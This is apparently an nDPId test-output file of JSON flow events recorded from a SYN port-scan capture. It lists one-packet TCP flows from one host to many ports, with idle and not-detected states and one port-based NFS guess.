-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 